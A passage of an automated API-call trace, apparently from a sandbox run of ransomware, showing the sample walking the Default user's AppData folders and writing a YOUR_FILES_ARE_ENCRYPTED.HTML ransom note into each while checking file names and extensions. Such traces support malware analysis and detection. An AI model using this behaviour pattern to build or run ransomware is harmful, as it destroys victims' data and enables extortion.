ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xa23a2415, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.058] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 1 [0171.058] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned 57 [0171.058] GetProcessHeap () returned 0x270000 [0171.058] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.058] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0171.058] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0171.058] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.058] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.059] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.059] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0171.059] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 87 [0171.059] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\rsa\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0171.059] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0171.062] CloseHandle (hObject=0x58c) returned 1 [0171.062] GetProcessHeap () returned 0x270000 [0171.063] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7769010 | out: hHeap=0x270000) returned 1 [0171.063] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xf15107a6, ftLastWriteTime.dwHighDateTime=0x1cb88fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RSA", cAlternateFileName="")) returned 0 [0171.063] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0171.063] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0171.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Crypto\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\crypto\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5fc [0171.064] WriteFile (in: hFile=0x5fc, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0171.068] CloseHandle (hObject=0x5fc) returned 1 [0171.068] GetProcessHeap () returned 0x270000 [0171.069] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7759008 | out: hHeap=0x270000) returned 1 [0171.069] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0171.069] wnsprintfW (in: pszDest=0x76a0010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned 64 [0171.069] GetProcessHeap () returned 0x270000 [0171.069] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7759008 [0171.069] lstrcpyW (in: lpString1=0x7759008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer" [0171.070] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*" [0171.070] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0171.071] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xfa086aac, ftLastAccessTime.dwHighDateTime=0x1ca042b, ftLastWriteTime.dwLowDateTime=0xfa086aac, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.071] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0171.071] wnsprintfW (in: pszDest=0x7759008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned 77 [0171.071] GetProcessHeap () returned 0x270000 [0171.071] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x7769010 [0171.071] lstrcpyW (in: lpString1=0x7769010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch" [0171.071] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*" [0171.071] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfa086aac, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x896689f9, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xd36f7c8c, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd376a0ad, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x92, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.079] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\desktop.ini") returned 89 [0171.079] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.079] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.079] lstrlenW (lpString=".ini") returned 4 [0171.079] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd36d1b2c, ftCreationTime.dwHighDateTime=0x1ca043c, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xd36d1b2c, ftLastWriteTime.dwHighDateTime=0x1ca043c, nFileSizeHigh=0x0, nFileSizeLow=0x122, dwReserved0=0x0, dwReserved1=0x60, cFileName="Shows Desktop.lnk", cAlternateFileName="SHOWSD~1.LNK")) returned 1 [0171.079] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\Shows Desktop.lnk") returned 95 [0171.079] lstrcmpW (lpString1="Shows Desktop.lnk", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.079] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0171.079] lstrlenW (lpString=".lnk") returned 4 [0171.079] PathFindExtensionW (pszPath="Shows Desktop.lnk") returned=".lnk" [0171.079] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="User Pinned", cAlternateFileName="USERPI~1")) returned 1 [0171.079] wnsprintfW (in: pszDest=0x7769010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned 89 [0171.079] GetProcessHeap () returned 0x270000 [0171.079] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75aa008 [0171.082] lstrcpyW (in: lpString1=0x75aa008, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned" [0171.082] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*" [0171.082] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0171.083] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bb27ddd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.083] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ImplicitAppShortcuts", cAlternateFileName="IMPLIC~1")) returned 1 [0171.083] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned 110 [0171.083] GetProcessHeap () returned 0x270000 [0171.083] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75ba010 [0171.084] lstrcpyW (in: lpString1=0x75ba010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0171.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0171.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0171.084] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.085] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbc90fc20, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x89857bdd, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0171.085] FindClose (in: hFindFile=0x42f32c0 | out: hFindFile=0x42f32c0) returned 1 [0171.085] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 140 [0171.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\internet explorer\\quick launch\\user pinned\\implicitappshortcuts\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x590 [0171.086] WriteFile (in: hFile=0x590, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebcee4, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebcee4*=0x3c00, lpOverlapped=0x0) returned 1 [0171.088] CloseHandle (hObject=0x590) returned 1 [0171.088] GetProcessHeap () returned 0x270000 [0171.089] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75ba010 | out: hHeap=0x270000) returned 1 [0171.089] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="TaskBar", cAlternateFileName="")) returned 1 [0171.089] wnsprintfW (in: pszDest=0x75aa008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned 97 [0171.089] GetProcessHeap () returned 0x270000 [0171.090] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75ba010 [0171.090] lstrcpyW (in: lpString1=0x75ba010, lpString2="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0171.090] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0171.090] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f32c0 [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xbc90fc20, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, lpFindFileData=0x4ebcc18 | out: lpFindFileData=0x4ebcc18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xbca66880, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xbca66880, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8bbe64be, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0xd3, dwReserved0=0x0, dwReserved1=0x60, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0171.105] wnsprintfW (in: pszDest=0x75ba010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\desktop.ini") returned 109 [0171.105] lstrcmpW (lpString1="desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0171.105] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.105] lstrlenW (lpString=".ini") returned 4 [0171.105] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0171.105] FindNextFileW (in: hFindFile=0x42f32c0, 